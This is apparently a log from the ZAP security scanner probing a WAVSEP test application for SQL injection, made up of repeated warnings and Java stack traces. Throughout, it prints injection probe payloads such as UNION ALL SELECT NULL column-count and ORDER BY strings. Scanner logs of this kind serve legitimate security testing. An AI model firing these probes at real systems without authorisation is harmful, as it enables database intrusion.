org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681484 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681485 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681486 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681487 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681487 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681489 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681489 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681489 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681490 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 2440#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 2440# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681491 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681492 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681492 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681493 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at 